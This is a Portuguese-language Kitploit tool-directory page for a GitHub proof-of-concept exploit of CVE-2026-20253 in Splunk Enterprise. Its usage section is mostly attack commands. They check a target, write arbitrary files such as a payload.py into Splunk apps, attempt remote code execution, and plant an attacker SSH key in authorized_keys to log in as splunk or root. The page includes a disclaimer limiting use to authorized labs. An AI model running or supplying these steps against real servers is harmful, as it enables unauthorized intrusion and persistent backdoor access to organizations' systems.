Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-20253 — CVE-2026-20253 - Splunk Enterprise | Kitploit
Ferramentas/GitHubGitHub/horkimhab/cve-2026-20253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubhorkimhab/cve-2026-20253

CVE-2026-20253

CVE-2026-20253 - Splunk Enterprise

Ver Repositório
há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-20253 - Splunk Enterprise

⚡ Uso Simples

Utilize este projeto apenas em ambientes seguros e autorizados, como:

  • Máquinas virtuais locais
  • Contêineres Docker
  • Configurações de laboratório isoladas
  • Ambientes de teste de penetração autorizados

Exemplo de configuração:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-20253
cd CVE-2026-20253

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirements
pip install -r requirements.txt

Exemplo de uso:

root@kitploit:~
# Basic check
python3 cve-2026-20253.py -t http://target:8000 --check

# Write empty/truncated file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned"

# Write with content from file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt

# Advanced (restore + content)
python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore

# RCE attempt
python3 cve-2026-20253.py -t http://target:8000 --rce

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/path/to/target/file.py" \
  --content poc-content.txt --restore


# SSH 

# Generate SSH key pair (if you don't have one)
ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N ""

# Or use RSA if target is older
# ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N ""

cat ~/.ssh/splunk_poc_key.pub > poc-content.txt

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt \
  --restore

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt

# Make sure permissions are correct on your side
chmod 600 ~/.ssh/splunk_poc_key

# Connect
ssh -i ~/.ssh/splunk_poc_key splunk@target_ip

# Or as root
ssh -i ~/.ssh/splunk_poc_key root@target_ip


# Step 1: Create directory (may not always work)
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder"

# Step 2: Write authorized_keys
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt

mkdir -p /home/splunk/.ssh
chmod 700 /home/splunk/.ssh
chmod 600 /home/splunk/.ssh/authorized_keys
chown -R splunk:splunk /home/splunk/.ssh

Créditos ou Referências

  • https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html
  • watchTowr-vs-Splunk-CVE-2026-20253: https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • CVE-2026-20253-0xBlackash: https://github.com/0xBlackash/CVE-2026-20253

📚 Repositório Educacional de Pesquisa em Segurança

Um repositório para aprender, testar e pesquisar conceitos de cibersegurança em ambientes controlados.


⚠️ Aviso de Segurança e Legal

Propósito

Este repositório é destinado exclusivamente a pesquisa educacional e autorizada em segurança.

Foi projetado para ajudar os utilizadores a aprender sobre:

  • Vulnerabilidades de segurança
  • Conceitos de sandbox e isolamento
  • Práticas de codificação segura e defensiva

Uso Autorizado Apenas

Utilize este repositório apenas em ambientes onde você tenha permissão, como:

  • Laboratórios pessoais ou máquinas virtuais
  • Docker ou ambientes isolados
  • Testes de penetração autorizados
  • Treinamento em cibersegurança ou pesquisa acadêmica

O uso não autorizado ou ilegal é estritamente proibido.


Sem Responsabilidade

O autor e os colaboradores não são responsáveis por qualquer dano, uso indevido, problemas legais ou perdas causadas por este projeto.

Ao utilizar este repositório, você concorda que:

  • Você é responsável por suas próprias ações
  • Você o utilizará de forma legal e ética
  • O projeto é fornecido sem garantia

Uso Ético

Este projeto destina-se a:

  • Pesquisa defensiva em segurança
  • Educação em cibersegurança
  • Conscientização sobre vulnerabilidades
  • Pesquisa em sistemas e software seguros

Por favor, siga práticas de divulgação responsável e cumpra todas as leis aplicáveis.


Contato

Para divulgação responsável ou colaboração, entre em contato com o mantenedor do repositório através do GitHub.

Baixar ferramenta